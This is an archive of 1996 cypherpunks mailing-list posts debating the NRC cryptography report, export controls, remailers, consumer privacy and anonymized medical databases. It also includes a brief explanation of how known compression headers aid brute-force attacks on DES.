>speak untruthfully without detection.  A different approach to AP to
>ensuring honesty in politicians.

If such a device were to exist, you can bet your last e-buck
that the politicians would be the LAST to be tested.  Today,
they ban or highly regulte the PRIVATE use of lie detectors.
The excuse is "reliability," but the various levels of 
government still use them for their own purposes.

With a 100% reliable device, they would either claim
"national security"--the government needs to lie some
times for your own good--or they would rig or evade its
application to themselves.  Count on it.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 1 Jun 1996 07:40:19 +0800
To: snow <cypherpunks@toad.com
Subject: Re: Something that just crossed my mind. Sorry.
Message-ID: <2.2.32.19960531170109.007070cc@popmail.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                       SANDY SANDFORT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

C'punks,

At 10:35 PM 5/30/96 -0500, snow wrote:

>It is my position (until proven wrong--please) that larger business DON'T
>want anonymity. They _want_ to be able to track purchases and use of their
>product for several reasons. 

Two quick answers:

1)      What big business wants and what it would be
        willing to accept in order to make sales, are
        two different things.  While demographic data
        are nice, an more robust economy full of big
        spenders is better.

2)      Big businesses are made up of individuals.
        Most individuals would still prefer to have 
        their own privacy preserved even if they would 
        prefer less privacy for others.  


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 1 Jun 1996 08:27:07 +0800
To: Hal <cypherpunks@toad.com
Subject: Re: NRC Cryptography Report: The Text of the Recommendations
Message-ID: <199605311725.KAA21348@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:04 PM 5/30/96 -0700, Hal wrote:

>This is then followed with a couple of pages of justification for why
>this relaxation of the export policies should be allowed.  Much is made
>of the fact that people will be more likely to use 56 bit encryption than
>the 40 bit which is currently allowed.  (This is an example of the
>perspective issue I mentioned above.)  However, nowhere is it stated why
>more than 56 bits is not OK, and why it is necessary to forbid repeated
>use to increase confidentiality.  There is not one word of discussion of
>this proviso.

A very curious omission!  It seems to me that if they're trying to explain 
any sort of limits on encryption, they should focus carefully on WHY those 
limits should exist, and why, exactly, those limits should be selected at 
any particular level.

>Third, although in broad terms the report is supportive of the use of
>cryptography, the specific recommendations do very little to liberalize
>current policies.  Free domestic access to cryptography is already the
>law.  Raising the export size limit from 40 to 56 bits is a step
>forward, but a small one.  Beyond 56 bits they recommend the
>requirement of escrowed encryption.  Given current moves to standardize
>on triple DES, this is a retrenching action.  They recommend
>criminalizing the use of cryptography in committing crimes, admitting
>that this may be used in some cases (as comparable mail fraud statues
>have been) to bring prosecutions against people who cannot be proven to
>have committed any other crime.  "[T]he committee understands that it
>is largely the integrity of the judicial and criminal justice process
>that will be the ultimate check on preventing its use for such
>purposes."

I can think of a much better "ultimate check on preventing its use for such 
purposes."

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moltar Ramone <jlasser@rwd.goucher.edu>
Date: Sat, 1 Jun 1996 07:08:12 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Java Crypto API questions
In-Reply-To: <v02120d10add4c726d6c2@[192.0.2.1]>
Message-ID: <Pine.SUN.3.91.960531114414.23205A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 31 May 1996, Lucky Green wrote:

> At 8:15 5/31/96, Moltar Ramone wrote:
> 
> >My guess would be that the first of these two points answers the second.
> >Everything is exportable -- except signed third-party security packages.
> >My bet would be that the exportable code would not be more than RC4-40 or
> >perhaps 1DES, but that a signed package would go to RC4-128, 3DES, and
> >RSA-1024.  However, the signature on that package would be on the
> >condition that the vendor/distributor of that package follow all export
> >regulations.
> 
> Where does this leave foreign vendors? Will Sun sign the 3DES package of a
> foreign vendor?

Probably.  But they won't be able to export the signed 3DES package :)  
It leaves foreign vendors in trouble, is where.

----------
Jon Lasser (410)532-7138                         - Obscenity  is a crutch  for
jlasser@rwd.goucher.edu                            inarticulate motherfuckers.
http://www.goucher.edu/~jlasser/
Finger for PGP key (1024/EC001E4D)               - Fuck the CDA.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Sat, 1 Jun 1996 09:17:50 +0800
To: Sandy Sandfort <cypherpunks@toad.com
Subject: Privacy (was Re: Something that just crossed my mind. Sorry.)
Message-ID: <2.2.32.19960531185137.00d74220@mail.software.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:01 AM 5/31/96 -0700, Sandy Sandfort wrote:
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                       SANDY SANDFORT
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
>
>>Two quick answers:
>
>1)      What big business wants and what it would be
>        willing to accept in order to make sales, are
>        two different things.  While demographic data
>        are nice, an more robust economy full of big
>        spenders is better.
>
>2)      Big businesses are made up of individuals.
>        Most individuals would still prefer to have 
>        their own privacy preserved even if they would 
>        prefer less privacy for others.  
>
>


I think what most people want is no surprises, by that I mean that peoples
perceptions of privacy should match reality.   In many cases that will mean
no demographics.  However there are a lot of situations where people will
trade information for something they perceive as having value.  I see
nothing wrong with this *if* there is informed consent.

John Pettitt, jpp@software.net
EVP, CyberSource Corporation, 415 473 3065

PGP Key available at:
http://www-swiss.ai.mit.edu/htbin/pks-extract-key.pl?op=get&search=0xB7AA3705





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 1 Jun 1996 12:01:56 +0800
To: cypherpunks@toad.com
Subject: Re: opinions on book "The Truth Machine"
Message-ID: <add49ffc03021004e128@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:06 AM 5/31/96, Timothy C. May wrote:
>It sounds like a "make.money.fast.by.promoting.this.book" scam to me.
...
>In any case, I decided to waste a few minutes skimming the opening parts of
>this "online media event novel" and discovered at the URL you cited:
>
>"Complete this brief survey and receive the first two and a half chapters
>of the book free! Upon submission, you will be given access to these
>chapters of The Truth Machine......"
>
>Utter bullshit. If the book was any good it would have a real publisher,
>not an opinion survey.

I confess to eventually yielding to temptation and answering the "survey"
questions (though I just made up some semi-random answers so as to get
Chapters 1-3, then 4-12, etc.).

It was truly bad stuff. Terribly written, confusing, no character
development except in a cartoonish way.

One correspondent chided me for saying that if the book was any good it
would have a real publisher, citing the opportunities for using the Web to
self-publish.

Well, the book is coming out in _printed_ form, for $20 or somesuch, from a
press I've never heard of.

If more than 500 copies are sold to actual paying, third-party customers,
I'll be surprised.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 1 Jun 1996 11:31:17 +0800
To: cypherpunks@toad.com
Subject: Re: Something that just crossed my mind. Sorry.
Message-ID: <add4a150040210043125@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:01 PM 5/31/96, Sandy Sandfort wrote:

>At 10:35 PM 5/30/96 -0500, snow wrote:
>
>>It is my position (until proven wrong--please) that larger business DON'T
>>want anonymity. They _want_ to be able to track purchases and use of their
>>product for several reasons.
>
>Two quick answers:
>
>1)      What big business wants and what it would be
>        willing to accept in order to make sales, are
>        two different things.  While demographic data
>        are nice, an more robust economy full of big
>        spenders is better.

To add to this point, "all XYZ is economics." (Crypto, security, customer
preferences, etc.)

A K-Mart or Radio Shack might place a value on any customer's spending
preferences at, for instance, $0.035 per $100 spent. This is just a figure
I'm inventing to make a point; market researchers within K-Mart or Radio
Shack probably have better estimates.

Thus, if customers give information away for "free," as many do, then a
Radio Shack will naturally try to collect this information. Even better if
they can get info about earning power, neighborhood, magazines subscribed
to, etc. Some stores try to collect this information.

In any case, few stores will turn down a sale because this $0.035 or even
$0.10 "value" is denied to them.

It's always about economics.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 1 Jun 1996 12:48:27 +0800
To: Moltar Ramone <shamrock@netcom.com>
Subject: Re: Java Crypto API questions
Message-ID: <199605312029.NAA01041@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:44 AM 5/31/96 -0400, Moltar Ramone wrote:
>On Fri, 31 May 1996, Lucky Green wrote:
 
>> Where does this leave foreign vendors? Will Sun sign the 3DES package of a
>> foreign vendor?
>
>Probably.  But they won't be able to export the signed 3DES package :)  
>It leaves foreign vendors in trouble, is where.

But why can't they just export the SIGNATURE, if it is detached from the  software itself?

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@stallion.ee>
Date: Sat, 1 Jun 1996 00:06:24 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Possible out-of-US remailer sites, 2nd edition
In-Reply-To: <01I5C4N7IN5C8Y52T1@mbcl.rutgers.edu>
Message-ID: <Pine.GSO.3.93.960531131647.2431A-100000@happyman>
MIME-Version: 1.0
Content-Type: text/plain


 Fri, 31 May 1996, E. ALLEN SMITH wrote:

>         I would appreciate comment on all aspects of this list. These include:
> additional companies and countries to add; companies or countries to take off
> (international politics & law is not my subject); and suggestions about where
> to look for more (it is quite possible that I did not locate all the lists of
> out-of-US ISPs).

I think you could add Estonia to the list. Although I have not discussed
this with local ISP's, I think running a remailer or nymserver from a Unix
shell account should not be such a big problem. The Internet connection to
the rest of the world is quite good and there are no government
regulations.

MicroLink OnLine (info@online.ee, http://www.online.ee/) has a PPP/Unix
shell account (on Sun Sparc) with 1MB disk space for 170 USD a year or 15
USD a month.  Just pay in advance, they have an on-line registration. 

Teleport (info@teleport.ee, http://www.teleport.ee/) is another company,
which has PPP/Unix (on Linux) with 1 MB for 8 USD a month or 96 MB a year.

Jüri Kaljundi
AS Stallion
jk@stallion.ee





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Sat, 1 Jun 1996 11:39:05 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: Remailer chain length?
In-Reply-To: <199605282112.QAA03652@einstein.ssz.com>
Message-ID: <199605311956.PAA25321@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Jim Choate writes:
>> It's better than nothing.  And besides, the more remailers there are, the
>> more difficult it is to do traffic analysis on remailer traffic.  Actually,
>> its the more remailers people chain messages through, but there are software
>> packages that can do this easily.  The more remailers there are, the longer
>> remailer chains have the possibility of becoming.
>
>If this is strictly true, why not simply run several instances of a remailer
>on the same machine. Then randomly chain them prior to sending them off
>site. This would be a lot cheaper and faster than trying to convince
>hobbyist to set it up or businesses to to use their profit & legal council.

Because it's not strictly true.  Implicit in traffic analysis is looking
at the "envelopes" of the traffic.  Since this means intercepting those
envelopes, once you've put your monitor on the first remailer at a site,
you've probably gotten all the rest at the site for free.

I don't think multiple remailers at the same site help anything.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sat, 1 Jun 1996 11:30:38 +0800
To: Bob Palacios <editor@cdt.org>
Subject: Re: Policy Post 2.21 - Your Privacy Online: CDT Unveils Demo & Clearinghouse
In-Reply-To: <v02140b08add3586ae4fd@[204.157.127.4]>
Message-ID: <Pine.BSF.3.91.960531145056.26513G-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




One can easily mess with the cookie file ...

See http://home.netscape.com/newsref/std/cookie_spec.html for info
on cookies. The only useful information the demo returns is taken from 
the domain associated with the address of the user. Must be for people 
who have never seen nslookup, whois, or run expn on the SMTP port of a 
server ...

My $.02

- r.w.


On Thu, 30 May 1996, Bob Palacios wrote:

> 
> (1) Your Privacy Online - CDT Unveils Demonstration & Clearinghouse
> 
> Many people surf the World Wide Web with an illusion of anonymity,
> believing that their activities are unobserved and that they can explore
> the Internet without leaving a trail.  In reality, this is not the case.
> 
> During the normal course of using the Internet, a great deal of personally
> revealing information is routinely generated, collected, and stored.  Most
> of this information is collected for purposes of system maintenance,
> billing, or other necessary functions.  But a sophisticated marketer,
> determined hacker, or law enforcement official can put together a detailed
> profile of your online activities, personal tastes, interests, habits and
> vices with relative ease.
> 
> Today, the Center for Democracy and Technology unveiled an interactive
> privacy demonstration and privacy policy clearinghouse on our World Wide
> Web site. The demonstration is located at
> 
>                     http://www.cdt.org/privacy/
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 1 Jun 1996 09:29:21 +0800
To: cypherpunks@toad.com
Subject: I told you so
Message-ID: <199605311928.PAA07729@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Reposted from the firewalls mailing list.

Date: Thu, 30 May 1996 16:39:33 -0700
From: Bill Stout <bill.stout@hidata.com>
Subject: DES-3 Story retraction

I retract the following story, it was told to me by a contractor 
who attended a MBONE group meeting on the MBONE, where the story 
originated:

Story:

   'A person working on the MBONE project did an unannounced 
   experiment across the internet using Triple-DES for MBONE, 
   and the very next day, 'ATF' agents knocked on his door and 
   warned him against exporting munitions.  The experimentor 
   was shaken by the fact that agents approached him so quickly 
   after the experiment.'

The MBONE experimentor referred to in the story was Van Jacobson 
at the Lawrence Berkeley Labs.  I followed this up since receiving
much interested mail responses.   I called Van Jacobson himself at 
the Lab (the web is a wonderful thing!), and found that the story 
was embellished.

The real event as told by Van Jacobson was:

   'MBONE software was at one time accidentally compiled with 
   links into libraries which contained DES, and someone (I 
   don't remember who) noticed the DES capability in our MBONE 
   binaries, and informed the group about the encryption export 
   problem.  The problem was promptly fixed.'

Sorry for the mis-information.

Bill

<=======10========20====Ruler for Eudora users==50========60========70========80
William B. Stout	| "Stop socialism in America!"
Senior Systems Admin 	| "Dilbert for President."
Hitachi Data Systems	| "Police power today=police state tomorrow."
Open Systems Center	| "The secret of life - being part of the process of 
Santa Clara, California	| creation."
408-970-4822		| #include <sanity_disclaimer.h>
<=======10========20========30========40========50========60========70========80




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremey Barrett <jeremey@forequest.com>
Date: Sat, 1 Jun 1996 11:28:01 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: NRC Cryptography Report: The Text of the Recommendations
In-Reply-To: <199605302210.PAA26716@mail.pacifier.com>
Message-ID: <Pine.BSI.3.91.960531152739.9416A-100000@descartes.forequest.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 30 May 1996, jim bell wrote:

> At 10:42 AM 5/30/96 -0700, John Gilmore wrote:
> >Recommendation 2:  National cryptography policy should be developed by
> >the executive and legislative branches on the basis of open public
> >discussion and governed by the rule of law.
> 
> Why is it that we even need a "national cryptography policy"?  We don't have 
> a "national beer policy," do we?  A "national furniture policy"?  A 
> "national pencil policy"?  A "national movie policy"?
> 
> The very concept of a "national cryptography policy" implies a level of 
> centrally-controlled interest that is unjustified given our constitutution and laws.
> 
> Jim Bell
> jimbell@pacifier.com
> 

I agree completely... the existence of a "national cryptography policy"
is a basic violation of the civil rights of every citizen in this country,
and should be dealt with as such.  The only reason for a government to
control the use of cryptography is to prevent its citizens from protecting
themselves against the activities of that government. 

It's analogous to removing freedom of public assembly.

The government "relaxing" crypto controls is like Hitler saying, "ok, ok,
I promise not to be SUCH a fascist."

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Jeremey Barrett
Senior Software Engineer			jeremey@forequest.com 
The ForeQuest Company       			http://www.forequest.com/

   "less is more."
		-- Mies van de Rohe.

   Ken Thompson has an automobile which he helped design.  Unlike most
   automobiles, it has neither speedometer, nor gas gage, nor any of the
   numerous idiot lights which plague the modern driver.  Rather, if the
   driver makes any mistake, a giant "?" lights up in the center of the
   dashboard.  "The experienced driver", he says, "will usually know
   what's wrong."

		-- 'fortune` output





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@cs.berkeley.edu (David Wagner)
Date: Sat, 1 Jun 1996 12:50:41 +0800
To: cypherpunks@toad.com
Subject: Re: Statistical analysis of anonymous databases
In-Reply-To: <v01540b02add1fc6e4658@[193.239.225.200]>
Message-ID: <4onta5$4fb@joseph.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


In article <v01540b02add1fc6e4658@[193.239.225.200]>,
Clay Olbon II <Clay.Olbon@dynetics.com> wrote:
> In medical research (this particular application - there are others I am
> sure) it is desirable to have a large database of individual medical
> histories available to search for correlations, risk factors, etc.  The
> problem, of course, is that many individuals want their medical histories
> kept private.  It is therefore necessary to maintain a database that is not
> traceable back to individuals.  An additional requirement is that people
> must be able to add additional information to their records as it becomes
> available.

How about a simple non-technical solution?  Each patient picks a
random pseudonym; the database is keyed off that pseudonym, and the
person's True Name(tm) never appears in the database.  Patients
should remember their pseudonym (or write it down); then they can
add information to the database.

Ahh, anonymity.

(Hey, I posted about something exportable-- that should fill my
quota for the year. :-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Sat, 1 Jun 1996 11:18:20 +0800
To: Moltar Ramone <jlasser@rwd.goucher.edu>
Subject: Re: Java Crypto API questions
In-Reply-To: <Pine.SUN.3.91.960531114414.23205A-100000@rwd.goucher.edu>
Message-ID: <9605312056.AA01716@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Moltar Ramone writes:
>  Probably.  But they won't be able to export the signed 3DES
>  package :) It leaves foreign vendors in trouble, is where.

Sun can export the signature though.  The vendor already has the package,  
they just need the sig/cert...

andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 1 Jun 1996 11:14:43 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Optimism re NRC Cryptography Report
In-Reply-To: <add44f8502021004f975@[205.199.118.202]>
Message-ID: <Pine.GUL.3.93.960531155935.11396G-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I agree. As a political matter, which is often what really counts, the NRC
report is almost unambiguously positive. It pays at least lip service to
everything that civil libertarians and coders who'd like to be able to
export crypto have been saying for years, thereby legitimizing them. 

The fact that the technical details -- 56-bit encryption, suggestions that
surveilance within the US might be a good idea -- betray the supposed
conclusions of the report is largely irrelevant. The general public/
politicians aren't going to understand the technical details. They're
going to see the headline, "NRC Report Backs Crypto Exports and *Real*
Security."

Work the headline, claim that they agree with you 100% (even though you
know that they don't), and continue to say what you believe. It's called
politics.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moltar Ramone <jlasser@rwd.goucher.edu>
Date: Sat, 1 Jun 1996 11:44:48 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Java Crypto API questions
In-Reply-To: <199605312029.NAA01041@mail.pacifier.com>
Message-ID: <Pine.SUN.3.91.960531161634.28820A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 31 May 1996, jim bell wrote:

> >Probably.  But they won't be able to export the signed 3DES package :)  
> >It leaves foreign vendors in trouble, is where.
> 
> But why can't they just export the SIGNATURE, if it is detached from the  software itself?

I would assume because the signature is probably not detached, or 
detachable.  But that's just a guess, really.

----------
Jon Lasser (410)532-7138                         - Obscenity  is a crutch  for
jlasser@rwd.goucher.edu                            inarticulate motherfuckers.
http://www.goucher.edu/~jlasser/
Finger for PGP key (1024/EC001E4D)               - Fuck the CDA.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 1 Jun 1996 07:54:01 +0800
To: cypherpunks@toad.com
Subject: NRC Report, 0, 1, 2
Message-ID: <199605311656.QAA04259@pipe3.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The first parts of the full NRC report are filed at our Web 
   site: 
 
 
   Preface, Executive Summary and Road Map: 
 
      http://pwp.usa.pipeline.com/~jya/nrc00.txt  (92 kb) 
 
 
   Part I -- Framing the Policy Issues 
 
   Chapter 1  Growing Vulnerability in the Information Age 
 
      http://pwp.usa.pipeline.com/~jya/nrc01.txt  (101 kb) 
 
 
   Chapter 2  Cryptography: Roles, Market and Infrastructure 
 
      http://pwp.usa.pipeline.com/~jya/nrc02.txt  (80 kb) 
 
   --------- 
 
   Remaining 6 chapters and 14 appendices to be announced as 
   completed. 
 
   --------- 
 
   Declan reports that an on-line version is due next week. 
 
   Note that National Academy Press is accepting orders for 
   the printed version, $45.00 + s/h each. For August. 
 
   National Academy Press, 2101 Constitution Ave, NW, Lockbox 
   285, Washington, DC 20055. Tel 1-800-624-6242. 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 1 Jun 1996 12:33:19 +0800
To: cypherpunks@toad.com
Subject: Re: Where does your data want to go today?
Message-ID: <199606010032.RAA27060@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  3:25 AM 5/31/96 -0400, David F. Ogren wrote:
>> > >   What problems does compression before encryption have? It at least
>> > >seems to work for PGP.
>> > >
>> > Most compression schemes put a header/index on the front of the
>> > compressed data.
>> > This makes recognizing the correct decryption very simple.
>> > 
>> > Call it a limited "known plaintext" situation.
>> 
>
>Using a random IV also limits the effectiveness of using known 
>headers for "known plaintext" attacks.  Also note that a good block 
>cipher isn't that vulnerable even to "known plaintext" attacks.

I don't think this is true given a brute force attack.  Let me assume
DES-CBC as a specific system.  Let us assume that the plaintext is:

  IV || PKZIP2.1 || <compressed data>

Where IV is the 8 byte initialization vector.

The brute force system decrypts the first, and second blocks (8 bytes each)
of the cyphertext, XORs them, and compares the result with "PKZIP2.1".  If
the comparison is equal it has the key.

If we eliminated the header and just started with the compressed data, then
the brute force system would have to decrypt and decompress enough of the
data to run statistical tests.  The cost of the additional decryptions,
decompression, and statistical tests substantially raise the cost of the
brute force attack.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rick hoselton <hoz@univel.telescan.com>
Date: Sat, 1 Jun 1996 12:46:15 +0800
To: clouds@alpha.c2.org (The Dreamer)
Subject: Re: someone to "educate"
Message-ID: <199606010057.RAA18664@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:31 PM 5/30/96 -0700, you quoted someone:

>> Corporate policy dictates that we do not offer anonymous
>> accounts. It is corporate belief that there should be no
>> reason anyone needs anonymity on the net

Perhaps you could ask whoever sent you that message for their 
home phone number, address, and Visa Account number, to be  
posted to this newsletter.  After all, if they are sure this 
is a good policy, and they are not ashamed of it, then the 
individuals who authored it have nothing to hide!

If they really believe what they say, then they won't mind.
I, for one, am waiting.











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 1 Jun 1996 13:14:38 +0800
To: cypherpunks@toad.com
Subject: Re: Statistical analysis of anonymous databases
Message-ID: <add4e62c000210047c18@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:53 PM 5/31/96, David Wagner wrote:
>In article <v01540b02add1fc6e4658@[193.239.225.200]>,
>Clay Olbon II <Clay.Olbon@dynetics.com> wrote:
>> In medical research (this particular application - there are others I am
>> sure) it is desirable to have a large database of individual medical
>> histories available to search for correlations, risk factors, etc.  The
>> problem, of course, is that many individuals want their medical histories
>> kept private.  It is therefore necessary to maintain a database that is not
>> traceable back to individuals.  An additional requirement is that people
>> must be able to add additional information to their records as it becomes
>> available.
>
>How about a simple non-technical solution?  Each patient picks a
>random pseudonym; the database is keyed off that pseudonym, and the
>person's True Name(tm) never appears in the database.  Patients
>should remember their pseudonym (or write it down); then they can
>add information to the database.

This "leaks" too much information. It is not hard at all to figure out that
the only 32-year-old white male with appendicitis is Sidney Jackson. And so
on, for enough of the patients to effectively identify most or even all of
them.

Blinding only the true name while leaving the essentially unique parameter
sets unchanged pretty much makes the name blinding moot. I have a hunch
it's possible to blind the individual parameters in some way so as to make
analysis possible, but I don't have any approaches in mind.

I recall that Joan Feigenbaum was working on "computing with encrypted
instances" for her Ph.D. work at Stanford (she's now at one of the AT&Ts
now). The idea being quite similar to this application: transform a set of
data for analysis by a party which is not to know the nature of the work
being done, then transforms back the answers obtained.

And there is another angle discussed a few years back in connection with
AIDS testing. Specifically, for door-to-door polls asking if a person has
been tested for AIDS (or whatever). One effectively "confuses" the answer
by flipping a coin  or rolling a die and "switching" the answer depending
on the results. This allows any particular person to, for example, say
"Yes" to the question "Have you been tested for AIDS?" without this
actually being the case. (The tosses have to be skewed so that
statisticians can still extract/deconvolve useful information.) I think of
this as "plausible deniability."

Of course, this is confusing to the average person, and maybe even to folks
like us, so this proposal (by I don't recall whom) has not gone very far.
But it shows that some semi-cryptographic protocols could be used to get
some sensitive information.

I don't know if something like this could be used for the medical database
problem, but it's interesting.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Date: Sat, 1 Jun 1996 11:32:38 +0800
To: cypherpunks@toad.com
Subject: Re: Optimism re NRC Cryptography Report
Message-ID: <9605312250.AA20290@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 07:40 AM 5/31/96 -0700, Timothy C. May wrote:
>This should be enough to ensure our victory. (Not that I think that even
>fairly repressive legislation would've been enough to defeat us, but a new
>breathing spell can only help.)

        Actually, I felt this upon reading the general recommendations, but
then in reading the expansion of the recommendations, I could see a lot
there for the continuance of the "status-quo" type of attitude. After
talking about it with other people, my feeling is that the document might be
all things to all people...? Pro-crypto will be happy with it and point to
this para and that, "anti"-crypto (law enforcement type) could also be happy
with it and point to that para and the other. The question then is, how will
it be read/perceived by its audience (which I suspect is legislators.) Given
the way the press is reporting, it is being received as a pro-crypto report,
congress might pick up on it. Unfortunately, it might pick up on it with
respect to publicity and posturing, and a fair amount of "the briefing" back
door stuff will continue.

        Can't say though.
_______________________
Regards,            If it weren't for the last minute, 
                    nothing would ever get done.
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 1 Jun 1996 10:41:22 +0800
To: cypherpunks@toad.com
Subject: NRC Report, 3
Message-ID: <199605311902.TAA14046@pipe3.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Chapter 3  Needs for Access to Encrypted Information 
 
      http://pwp.usa.pipeline.com/~jya/nrc03.txt  (88 kb) 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Holiday <ncognito@gate.net>
Date: Sat, 1 Jun 1996 11:22:04 +0800
To: cypherpunks@toad.com
Subject: Asendmail V0.5beta is available now.
Message-ID: <Pine.A32.3.93.960531185723.54098A-100000@navajo.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


The beta release of asendmail is now available from:

http://www.cyberpass.net/~ncognito/asendmail.tar.gz

The compressed archive is about 13k.

Included are the current proxys.conf and a sample fakes.conf file, along
with pretty decent instructions for use with and without mix. 

I'll be out of town for the next 2 days, so I'll not be responding to
email until monday.

Adios.. 

Ben





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 1 Jun 1996 13:52:50 +0800
